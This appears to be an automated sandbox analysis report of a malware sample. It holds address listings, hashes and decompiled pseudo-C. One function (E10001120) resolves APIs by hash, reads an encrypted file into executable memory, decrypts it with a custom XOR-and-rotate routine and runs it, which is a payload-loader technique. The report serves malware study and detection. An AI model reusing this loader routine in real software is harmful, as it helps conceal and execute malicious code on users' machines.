                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x004071ab
                                                0x004071b3
                                                0x004071ba
                                                0x004071bc
                                                0x004071c3
                                                0x004071c7
                                                0x004071c7
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407004
                                                0x00407007
                                                0x00407007
                                                0x0040700d
                                                0x0040700d
                                                0x004067a9
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x00000000
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x00406822
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00406f91
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406977
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x0040698e
                                                0x00000000
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be6
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf3
                                                0x00406bf6
                                                0x00406bf9
                                                0x00406bfc
                                                0x00406bff
                                                0x00406c01
                                                0x00406c08
                                                0x00406c09
                                                0x00406c0b
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406c19
                                                0x00406bca
                                                0x00406bcd
                                                0x00406bd0
                                                0x00406bda
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c71
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c7b
                                                0x00406c7f
                                                0x00000000
                                                0x00000000
                                                0x00406c85
                                                0x00406c87
                                                0x00406c8b
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00000000
                                                0x00000000
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406ced
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cfd
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x00406ce8
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00406d23
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d36
                                                0x00406d3b
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00406c1c
                                                0x00406c1c
                                                0x00406c1f
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00000000
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f81
                                                0x00406f84
                                                0x00406f8e
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6b
                                                0x00406f6e
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x0040704f
                                                0x0040704f
                                                0x00000000
                                                0x0040704f
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x0040710c
                                                0x0040700d
                                                0x00000000
                                                0x00000000
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d62
                                                0x00406d64
                                                0x00406d64
                                                0x00406d65
                                                0x00406d68
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d80
                                                0x00000000
                                                0x00000000
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00000000
                                                0x00407065
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x00000000
                                                0x004071a1
                                                0x0040706f
                                                0x00407072
                                                0x00407075
                                                0x00407079
                                                0x0040707c
                                                0x00407082
                                                0x00407084
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708d
                                                0x0040708d
                                                0x00407091
                                                0x004070f1
                                                0x004070f4
                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00407013
                                                0x0040700d
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b1
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070e3
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00406cd3
                                                0x00406cd3
                                                0x00000000
                                                0x00406cd3
                                                0x00406f54
                                                0x00407189
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x004071c0
                                                0x004071c0
                                                0x00000000
                                                0x004071c0
                                                0x0040700d
                                                0x00406f94
                                                0x00406f91

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                                                • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001120, Relevance: 4.6, APIs: 3, Instructions: 143filememoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 62%
                                                			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t137;

				_v8 =  *0x10003028 ^ _t137;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 = _v529 & 0x000000ff ^ 0x00000061;
					_v529 = (_v529 & 0x000000ff) - 0x82;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 = (_v529 & 0x000000ff) + 0x83;
					_v529 = (_v529 & 0x000000ff) >> 0x00000005 | (_v529 & 0x000000ff) << 0x00000003;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 = (_v529 & 0x000000ff) + 0x49;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + 0x30;
					_v529 = _v529 & 0x000000ff ^ 0x0000001a;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E10001453(_v8 ^ _t137);
			}



















                                                0x10001130
                                                0x10001133
                                                0x1000113d
                                                0x1000114c
                                                0x10001166
                                                0x10001180
                                                0x1000119a
                                                0x100011b4
                                                0x100011ce
                                                0x100011e8
                                                0x100011fa
                                                0x1000120c
                                                0x10001231
                                                0x10001246
                                                0x10001262
                                                0x10001286
                                                0x1000128c
                                                0x100012a7
                                                0x100012c7
                                                0x100012d7
                                                0x100012ea
                                                0x100012fd
                                                0x10001310
                                                0x1000132c
                                                0x1000133f
                                                0x1000134f
                                                0x1000135e
                                                0x1000136e
                                                0x1000137e
                                                0x10001396
                                                0x100012a1
                                                0x100012a1
                                                0x1000139d
                                                0x100013b0

                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344782910.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.344773130.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.344794583.0000000010002000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AllocCreateReadVirtual
                                                • String ID:
                                                • API String ID: 3585551309-0
                                                • Opcode ID: 02df6ed1846b1b7f3acb5f014a7e434e89ee53b45302fc8072655611be58dc96
                                                • Instruction ID: 9e54961b5cbf5cfdd6e00178487e3211d3267a10bfa5f4eea639f68fc5042529
                                                • Opcode Fuzzy Hash: 02df6ed1846b1b7f3acb5f014a7e434e89ee53b45302fc8072655611be58dc96
                                                • Instruction Fuzzy Hash: 74615C74C462BC9BDB20CBA48C9DBEDBBB4AF59201F0481C9E59C66286C6345FC0CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E0040329A(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x41f8fc; // 0x310ae
				_t34 = _t32 -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t10 =  *0x41f900; // 0x391d0
					_t31 = 0x4000;
					_t11 = _t10 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						_t19 =  *0x41f908; // 0xbce
						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40c4c6
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc; // 0x310ae
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                0x0040329d
                                                0x004032aa
                                                0x004032bd
                                                0x004032c2
                                                0x004033f2
                                                0x004033f4
                                                0x00000000
                                                0x004033fa
                                                0x004032ce
                                                0x004032e1
                                                0x004032e7
                                                0x004032ed
                                                0x004032f8
                                                0x004032f8
                                                0x004032fd
                                                0x00403302
                                                0x0040330a
                                                0x0040330c
                                                0x0040330c
                                                0x00403315
                                                0x0040331c
                                                0x00000000
                                                0x00000000
                                                0x00403322
                                                0x00403328
                                                0x0040332e
                                                0x00000000
                                                0x00403334
                                                0x0040333a
                                                0x00403344
                                                0x0040335a
                                                0x0040335f
                                                0x00403364
                                                0x0040336a
                                                0x00403370
                                                0x0040337a
                                                0x00403381
                                                0x00000000
                                                0x00000000
                                                0x00403383
                                                0x00403389
                                                0x0040338b
                                                0x004033ae
                                                0x004033b4
                                                0x00000000
                                                0x00000000
                                                0x004033b6
                                                0x004033b8
                                                0x00000000
                                                0x00000000
                                                0x004033ba
                                                0x004033ba
                                                0x004033cd
                                                0x00000000
                                                0x00000000
                                                0x004033dc
                                                0x00000000
                                                0x004033dc
                                                0x00403395
                                                0x0040339c
                                                0x004033e9
                                                0x004033ef
                                                0x004033ef
                                                0x00000000
                                                0x004033ef
                                                0x0040339e
                                                0x004033a4
                                                0x004033aa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004033ed
                                                0x004033ed
                                                0x00000000
                                                0x004033ed
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004032AE
                                                  • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                                                • SetFilePointer.KERNELBASE(000310AE,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FilePointer$CountTick
                                                • String ID:
                                                • API String ID: 1092082344-0
                                                • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                                                • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
